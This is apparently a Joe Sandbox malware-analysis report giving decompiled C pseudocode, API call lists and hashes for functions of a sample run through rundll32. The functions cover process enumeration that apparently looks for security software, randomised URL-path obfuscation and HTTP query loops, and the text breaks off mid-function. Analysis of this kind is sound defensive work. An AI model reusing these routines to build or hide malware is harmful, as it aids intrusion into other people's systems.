                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 86daa996740e22599466511c7f90fbb7744611fa29d71c71d6646bfd7ce0b39b
                                                  • Instruction ID: 12d66a40a65748187899f971ec4ec8fd6d7b7a254c3e36bb25119572578cdfc3
                                                  • Opcode Fuzzy Hash: 86daa996740e22599466511c7f90fbb7744611fa29d71c71d6646bfd7ce0b39b
                                                  • Instruction Fuzzy Hash: C4212932A357029BCB757A6C6C4CB6AF6A9FF88721F250215FD5ADB140DBB0C80186F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 38%
                                                  			E052DA0B2(void* __ecx, void* __esi) {
                                                  				char _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				long _v20;
                                                  				long _t34;
                                                  				long _t39;
                                                  				long _t42;
                                                  				long _t56;
                                                  				intOrPtr _t58;
                                                  				void* _t59;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  
                                                  				_t61 = __esi;
                                                  				_t59 = __ecx;
                                                  				_t60 =  *0x52dd144; // 0x52dad81
                                                  				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                  				do {
                                                  					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                  					_v20 = _t34;
                                                  					if(_t34 != 0) {
                                                  						L3:
                                                  						_push( &_v16);
                                                  						_push( &_v8);
                                                  						_push(_t61 + 0x2c);
                                                  						_push(0x20000013);
                                                  						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                  						_v8 = 4;
                                                  						_v16 = 0;
                                                  						if( *_t60() == 0) {
                                                  							_t39 = GetLastError();
                                                  							_v12 = _t39;
                                                  							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                  								L15:
                                                  								return _v12;
                                                  							} else {
                                                  								goto L11;
                                                  							}
                                                  						}
                                                  						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                  							goto L11;
                                                  						} else {
                                                  							_v16 = 0;
                                                  							_v8 = 0;
                                                  							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                  							_t58 = E052D2049(_v8 + 1);
                                                  							if(_t58 == 0) {
                                                  								_v12 = 8;
                                                  							} else {
                                                  								_push( &_v16);
                                                  								_push( &_v8);
                                                  								_push(_t58);
                                                  								_push(0x16);
                                                  								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                  								if( *_t60() == 0) {
                                                  									E052D9039(_t58);
                                                  									_v12 = GetLastError();
                                                  								} else {
                                                  									 *((char*)(_t58 + _v8)) = 0;
                                                  									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                  								}
                                                  							}
                                                  							goto L15;
                                                  						}
                                                  					}
                                                  					SetEvent( *(_t61 + 0x1c));
                                                  					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                  					_v12 = _t56;
                                                  					if(_t56 != 0) {
                                                  						goto L15;
                                                  					}
                                                  					goto L3;
                                                  					L11:
                                                  					_t42 = E052D1C47( *(_t61 + 0x1c), _t59, 0xea60);
                                                  					_v12 = _t42;
                                                  				} while (_t42 == 0);
                                                  				goto L15;
                                                   			}

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 052DA0C9
                                                  • SetEvent.KERNEL32(?), ref: 052DA0D9
                                                  • GetLastError.KERNEL32 ref: 052DA162
                                                    • Part of subcall function 052D1C47: WaitForMultipleObjects.KERNEL32(00000002,052DAA72,00000000,052DAA72,?,?,?,052DAA72,0000EA60), ref: 052D1C62
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  • GetLastError.KERNEL32(00000000), ref: 052DA197
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                   • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: 4859d057c5f5a5bb4bf657ee001ef830ab707d6e676146601c399d09c08cd876
                                                  • Instruction ID: 8b2205ba9d4c450cd8e6b91d4bc4e81c92c9581ec2786c90f47d1b83a806b178
                                                  • Opcode Fuzzy Hash: 4859d057c5f5a5bb4bf657ee001ef830ab707d6e676146601c399d09c08cd876
                                                  • Instruction Fuzzy Hash: 5231F7B5D14209EFEB20DF95D884EAEFBB9BF08250F50496AE146A2140D770EA45DF70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 40%
                                                  			E052D3BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                  				intOrPtr _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				char _v32;
                                                  				void* __esi;
                                                  				void* _t29;
                                                  				void* _t38;
                                                  				signed int* _t39;
                                                  				void* _t40;
                                                  
                                                  				_t36 = __ecx;
                                                  				_v32 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v12 = _a4;
                                                  				_t38 = E052D9763(__ecx,  &_v32);
                                                  				if(_t38 != 0) {
                                                  					L12:
                                                  					_t39 = _a8;
                                                  					L13:
                                                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                  						_t16 =  &(_t39[1]); // 0x5
                                                  						_t23 = _t16;
                                                  						if( *_t16 != 0) {
                                                  							E052DA022(_t23);
                                                  						}
                                                  					}
                                                  					return _t38;
                                                  				}
                                                  				if(E052DA72D(0x40,  &_v16) != 0) {
                                                  					_v16 = 0;
                                                  				}
                                                  				_t40 = CreateEventA(0x52dd2a8, 1, 0,  *0x52dd344);
                                                  				if(_t40 != 0) {
                                                  					SetEvent(_t40);
                                                  					Sleep(0xbb8);
                                                  					CloseHandle(_t40);
                                                  				}
                                                  				_push( &_v32);
                                                  				if(_a12 == 0) {
                                                  					_t29 = E052D8A51(_t36);
                                                  				} else {
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_t29 = E052D17D5(_t36);
                                                  				}
                                                  				_t41 = _v16;
                                                  				_t38 = _t29;
                                                  				if(_v16 != 0) {
                                                  					E052D1F99(_t41);
                                                  				}
                                                  				if(_t38 != 0) {
                                                  					goto L12;
                                                  				} else {
                                                  					_t39 = _a8;
                                                  					_t38 = E052D42EA( &_v32, _t39);
                                                  					goto L13;
                                                  				}
                                                   			}

                                                  APIs
                                                  • CreateEventA.KERNEL32(052DD2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,052D6880,?,00000001,?), ref: 052D3C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,052D6880,?,00000001,?,00000002,?,?,052D2417,?), ref: 052D3C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,052D6880,?,00000001,?,00000002,?,?,052D2417,?), ref: 052D3C5A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,052D6880,?,00000001,?,00000002,?,?,052D2417,?), ref: 052D3C61
                                                    • Part of subcall function 052D8A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,052D3C81,?,052D3C81,?,?,?,?,?,052D3C81,?), ref: 052D8B2B
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                   • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: 42b7461fe322ae81bca3e805808a1838ffb2fb7c31919ce7bc007a230c60eb06
                                                  • Instruction ID: 9604049c0c5b0d4c3127b686bb959f9c09b16cbc929656869db359d97990f70e
                                                  • Opcode Fuzzy Hash: 42b7461fe322ae81bca3e805808a1838ffb2fb7c31919ce7bc007a230c60eb06
                                                  • Instruction Fuzzy Hash: A5218373E2421DABCB10EFE4D8888EEF779BF44250B114825EA15A7140DB74D945CBB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E052D1A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                  				intOrPtr _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				intOrPtr _t26;
                                                  				intOrPtr* _t28;
                                                  				intOrPtr _t31;
                                                  				intOrPtr* _t32;
                                                  				void* _t39;
                                                  				int _t46;
                                                  				intOrPtr* _t47;
                                                  				int _t48;
                                                  
                                                  				_t47 = __eax;
                                                  				_push( &_v12);
                                                  				_push(__eax);
                                                  				_t39 = 0;
                                                  				_t46 = 0;
                                                  				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                  				_v8 = _t26;
                                                  				if(_t26 < 0) {
                                                  					L13:
                                                  					return _v8;
                                                  				}
                                                  				if(_v12 == 0) {
                                                  					Sleep(0xc8);
                                                  					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                  				}
                                                  				if(_v8 >= _t39) {
                                                  					_t28 = _v12;
                                                  					if(_t28 != 0) {
                                                  						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                  						_v8 = _t31;
                                                  						if(_t31 >= 0) {
                                                  							_t46 = lstrlenW(_v16);
                                                  							if(_t46 != 0) {
                                                  								_t46 = _t46 + 1;
                                                  								_t48 = _t46 + _t46;
                                                  								_t39 = E052D2049(_t48);
                                                  								if(_t39 == 0) {
                                                  									_v8 = 0x8007000e;
                                                  								} else {
                                                  									memcpy(_t39, _v16, _t48);
                                                  								}
                                                  								__imp__#6(_v16);
                                                  							}
                                                  						}
                                                  						_t32 = _v12;
                                                  						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                  					}
                                                  					 *_a4 = _t39;
                                                  					 *_a8 = _t46 + _t46;
                                                  				}
                                                  				goto L13;
                                                   			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                   • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: 3af52a71e7f3ffb2c4462e070ea1c24bcc99b94f921e13394ee7d4bb5caf2673
                                                  • Instruction ID: f6833d4da62798990073e3654db02058b796e6d404b0a6ceb087ba3b612f69b5
                                                  • Opcode Fuzzy Hash: 3af52a71e7f3ffb2c4462e070ea1c24bcc99b94f921e13394ee7d4bb5caf2673
                                                  • Instruction Fuzzy Hash: 6A216276A11209EFCB10DFA4D88899EBBB9FF49211B108169E805E7210EB709A54CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E052D788B(unsigned int __eax, void* __ecx) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				signed int _t21;
                                                  				signed short _t23;
                                                  				char* _t27;
                                                  				void* _t29;
                                                  				void* _t30;
                                                  				unsigned int _t33;
                                                  				void* _t37;
                                                  				unsigned int _t38;
                                                  				void* _t41;
                                                  				void* _t42;
                                                  				int _t45;
                                                  				void* _t46;
                                                  
                                                  				_t42 = __eax;
                                                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                  				_t38 = __eax;
                                                  				_t30 = RtlAllocateHeap( *0x52dd238, 0, (__eax >> 3) + __eax + 1);
                                                  				_v12 = _t30;
                                                  				if(_t30 != 0) {
                                                  					_v8 = _t42;
                                                  					do {
                                                  						_t33 = 0x18;
                                                  						if(_t38 <= _t33) {
                                                  							_t33 = _t38;
                                                  						}
                                                  						_t21 =  *0x52dd250; // 0x0
                                                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                  						 *0x52dd250 = _t23;
                                                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                  						memcpy(_t30, _v8, _t45);
                                                  						_v8 = _v8 + _t45;
                                                  						_t27 = _t30 + _t45;
                                                  						_t38 = _t38 - _t45;
                                                  						_t46 = _t46 + 0xc;
                                                  						 *_t27 = 0x2f;
                                                  						_t13 = _t27 + 1; // 0x1
                                                  						_t30 = _t13;
                                                  					} while (_t38 > 8);
                                                  					memcpy(_t30, _v8, _t38 + 1);
                                                  				}
                                                  				return _v12;
                                                  			}

















                                                  0x052d7893
                                                  0x052d7896
                                                  0x052d789c
                                                  0x052d78b4
                                                  0x052d78b8
                                                  0x052d78bb
                                                  0x052d78bd
                                                  0x052d78c0
                                                  0x052d78c2
                                                  0x052d78c5
                                                  0x052d78c7
                                                  0x052d78c7
                                                  0x052d78c9
                                                  0x052d78d4
                                                  0x052d78d9
                                                  0x052d78ea
                                                  0x052d78f2
                                                  0x052d78f7
                                                  0x052d78fa
                                                  0x052d78fd
                                                  0x052d78ff
                                                  0x052d7905
                                                  0x052d7908
                                                  0x052d7908
                                                  0x052d7908
                                                  0x052d7913
                                                  0x052d7918
                                                  0x052d7922

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,052D839A,00000000,?,?,052DA428,?,073095B0), ref: 052D7896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 052D78AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,052D839A,00000000,?,?,052DA428,?,073095B0), ref: 052D78F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 052D7913
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: 851d4f644a2740cb4d9c0eeb300549ca4f776ec562e10ebba0cdbb3f9b49471f
                                                  • Instruction ID: 2e6b5ed86a1152eb3d119901f461bb06e14ce6692b0d8e8402d95d2069bf02d7
                                                  • Opcode Fuzzy Hash: 851d4f644a2740cb4d9c0eeb300549ca4f776ec562e10ebba0cdbb3f9b49471f
                                                  • Instruction Fuzzy Hash: 7511C672E11115AFC7108A69EC8DE9EBFAAEF85260B050266F505D7180EA749E04D7B0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			E052D7A9A(intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v20;
                                                  				void* _t8;
                                                  				void* _t13;
                                                  				void* _t16;
                                                  				char* _t18;
                                                  				void* _t19;
                                                  
                                                  				_t19 = 0x27;
                                                  				_t1 =  &_v20; // 0x74666f53
                                                  				_t18 = 0;
                                                  				E052D6B43(_t8, _t1);
                                                  				_t16 = E052D2049(_t19);
                                                  				if(_t16 != 0) {
                                                  					_t3 =  &_v20; // 0x74666f53
                                                  					_t13 = E052D86D8(_t3, _t16, _a8);
                                                  					if(_a4 != 0) {
                                                  						__imp__(_a4);
                                                  						_t19 = _t13 + 0x27;
                                                  					}
                                                  					_t18 = E052D2049(_t19);
                                                  					if(_t18 != 0) {
                                                  						 *_t18 = 0;
                                                  						if(_a4 != 0) {
                                                  							__imp__(_t18, _a4);
                                                  						}
                                                  						__imp__(_t18, _t16);
                                                  					}
                                                  					E052D9039(_t16);
                                                  				}
                                                  				return _t18;
                                                  			}









                                                  0x052d7aa5
                                                  0x052d7aa6
                                                  0x052d7aa9
                                                  0x052d7aab
                                                  0x052d7ab6
                                                  0x052d7aba
                                                  0x052d7abf
                                                  0x052d7ac3
                                                  0x052d7acb
                                                  0x052d7ad0
                                                  0x052d7ad8
                                                  0x052d7ad8
                                                  0x052d7ae1
                                                  0x052d7ae5
                                                  0x052d7aeb
                                                  0x052d7aee
                                                  0x052d7af4
                                                  0x052d7af4
                                                  0x052d7afc
                                                  0x052d7afc
                                                  0x052d7b03
                                                  0x052d7b03
                                                  0x052d7b0e

                                                  APIs
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                    • Part of subcall function 052D86D8: wsprintfA.USER32 ref: 052D8734
                                                  • lstrlen.KERNEL32(052D23E9,00000000,00000000,00000027,00000005,00000000,00000000,052D96DA,74666F53,00000000,052D23E9,052DD00C,?,052D23E9), ref: 052D7AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 052D7AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 052D7AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
                                                  • Opcode ID: 6bbbdd1686ba54009f497856b71fece64f981c10b4e2082b1db52320d68a4d5e
                                                  • Instruction ID: 41f936aeb332fa1569ac40a52d12faf018d4650fcb95ecbb9c5e501ad459625c
                                                  • Opcode Fuzzy Hash: 6bbbdd1686ba54009f497856b71fece64f981c10b4e2082b1db52320d68a4d5e
                                                  • Instruction Fuzzy Hash: 4901A73221421AA7C7127AA5AC8CAEFBB69EF85256F084021F50655140EB798A45C7B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E052D757F() {
                                                  				char _v264;
                                                  				void* _v300;
                                                  				int _t8;
                                                  				intOrPtr _t9;
                                                  				int _t15;
                                                  				void* _t17;
                                                  
                                                  				_t15 = 0;
                                                  				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                  				if(_t17 != 0) {
                                                  					_t8 = Process32First(_t17,  &_v300);
                                                  					while(_t8 != 0) {
                                                  						_t9 =  *0x52dd27c; // 0x202a5a8
                                                  						_t2 = _t9 + 0x52dee54; // 0x73617661
                                                  						_push( &_v264);
                                                  						if( *0x52dd0fc() != 0) {
                                                  							_t15 = 1;
                                                  						} else {
                                                  							_t8 = Process32Next(_t17,  &_v300);
                                                  							continue;
                                                  						}
                                                  						L7:
                                                  						CloseHandle(_t17);
                                                  						goto L8;
                                                  					}
                                                  					goto L7;
                                                  				}
                                                  				L8:
                                                  				return _t15;
                                                  			}









                                                  0x052d758a
                                                  0x052d7594
                                                  0x052d7598
                                                  0x052d75a2
                                                  0x052d75d3
                                                  0x052d75a9
                                                  0x052d75ae
                                                  0x052d75bb
                                                  0x052d75c4
                                                  0x052d75db
                                                  0x052d75c6
                                                  0x052d75ce
                                                  0x00000000
                                                  0x052d75ce
                                                  0x052d75dc
                                                  0x052d75dd
                                                  0x00000000
                                                  0x052d75dd
                                                  0x00000000
                                                  0x052d75d7
                                                  0x052d75e3
                                                  0x052d75e8

                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 052D758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 052D75A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 052D75CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 052D75DD
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 31fe2f4b3d4519bf38c417eba35ac8ea56e525d896eb1f9924cdd1ece33a58be
                                                  • Instruction ID: c985789979ff4ed9f845de9828da025c966264be19876c9c995f37194decaed2
                                                  • Opcode Fuzzy Hash: 31fe2f4b3d4519bf38c417eba35ac8ea56e525d896eb1f9924cdd1ece33a58be
                                                  • Instruction Fuzzy Hash: 93F0BB716251296BDB20A6769C4DFFBB7ADDFC5351F040061FD0AD2040EF68D9498AF2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E052D7C61(void* __esi) {
                                                  				struct _SECURITY_ATTRIBUTES* _v4;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  
                                                  				_v4 = 0;
                                                  				memset(__esi, 0, 0x38);
                                                  				_t8 = CreateEventA(0, 1, 0, 0);
                                                  				 *(__esi + 0x1c) = _t8;
                                                  				if(_t8 != 0) {
                                                  					_t10 = CreateEventA(0, 1, 1, 0);
                                                  					 *(__esi + 0x20) = _t10;
                                                  					if(_t10 == 0) {
                                                  						CloseHandle( *(__esi + 0x1c));
                                                  					} else {
                                                  						_v4 = 1;
                                                  					}
                                                  				}
                                                  				return _v4;
                                                  			}






                                                  0x052d7c6b
                                                  0x052d7c6f
                                                  0x052d7c84
                                                  0x052d7c88
                                                  0x052d7c8b
                                                  0x052d7c91
                                                  0x052d7c95
                                                  0x052d7c98
                                                  0x052d7ca3
                                                  0x052d7c9a
                                                  0x052d7c9a
                                                  0x052d7c9a
                                                  0x052d7c98
                                                  0x052d7cb1

                                                  APIs
                                                  • memset.NTDLL ref: 052D7C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 052D7C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 052D7C91
                                                  • CloseHandle.KERNEL32(?), ref: 052D7CA3
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: 402c4d76e567e6352132f12bd2c1369f54cb8ef67d0ad77a41f3d4b07d3d8f17
                                                  • Instruction ID: 8e4eb656d1fef8089565c98bf6859aa766dafa637c675c4ab61919a253fa2ea4
                                                  • Opcode Fuzzy Hash: 402c4d76e567e6352132f12bd2c1369f54cb8ef67d0ad77a41f3d4b07d3d8f17
                                                  • Instruction Fuzzy Hash: 27F05EB552930DBFE3105F22DCC5C2BFBACFF851D9B15892DF04691141DA36A8098AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E052D970F() {
                                                  				void* _t1;
                                                  				intOrPtr _t5;
                                                  				void* _t6;
                                                  				void* _t7;
                                                  				void* _t11;
                                                  
                                                  				_t1 =  *0x52dd26c; // 0x31c
                                                  				if(_t1 == 0) {
                                                  					L8:
                                                  					return 0;
                                                  				}
                                                  				SetEvent(_t1);
                                                  				_t11 = 0x7fffffff;
                                                  				while(1) {
                                                  					SleepEx(0x64, 1);
                                                  					_t5 =  *0x52dd2b8; // 0x0
                                                  					if(_t5 == 0) {
                                                  						break;
                                                  					}
                                                  					_t11 = _t11 - 0x64;
                                                  					if(_t11 > 0) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				_t6 =  *0x52dd26c; // 0x31c
                                                  				if(_t6 != 0) {
                                                  					CloseHandle(_t6);
                                                  				}
                                                  				_t7 =  *0x52dd238; // 0x6f10000
                                                  				if(_t7 != 0) {
                                                  					HeapDestroy(_t7);
                                                  				}
                                                  				goto L8;
                                                  			}








                                                  0x052d970f
                                                  0x052d9716
                                                  0x052d9760
                                                  0x052d9762
                                                  0x052d9762
                                                  0x052d971a
                                                  0x052d9720
                                                  0x052d9725
                                                  0x052d9729
                                                  0x052d972f
                                                  0x052d9736
                                                  0x00000000
                                                  0x00000000
                                                  0x052d9738
                                                  0x052d973d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052d973d
                                                  0x052d973f
                                                  0x052d9747
                                                  0x052d974a
                                                  0x052d974a
                                                  0x052d9750
                                                  0x052d9757
                                                  0x052d975a
                                                  0x052d975a
                                                  0x00000000

                                                  APIs
                                                  • SetEvent.KERNEL32(0000031C,00000001,052D8099), ref: 052D971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 052D9729
                                                  • CloseHandle.KERNEL32(0000031C), ref: 052D974A
                                                  • HeapDestroy.KERNEL32(06F10000), ref: 052D975A
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: 05c80442af6500b43496740be928cff0798c4ccaee227330b74d4dc716cce6ba
                                                  • Instruction ID: 78e38cab776e133dcdad3ce6c142c2e5db1a41ee66e9e1ca7ccd973060ca62a2
                                                  • Opcode Fuzzy Hash: 05c80442af6500b43496740be928cff0798c4ccaee227330b74d4dc716cce6ba
                                                  • Instruction Fuzzy Hash: 4EF01275F3A71557E7506F75B94DB067F98BF006717050610B819E72C4DE24D880D970
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 50%
                                                  			E052D75E9(void** __esi) {
                                                  				char* _v0;
                                                  				intOrPtr _t4;
                                                  				intOrPtr _t6;
                                                  				void* _t8;
                                                  				intOrPtr _t11;
                                                  				void* _t12;
                                                  				void** _t14;
                                                  
                                                  				_t14 = __esi;
                                                  				_t4 =  *0x52dd32c; // 0x73095b0
                                                  				__imp__(_t4 + 0x40);
                                                  				while(1) {
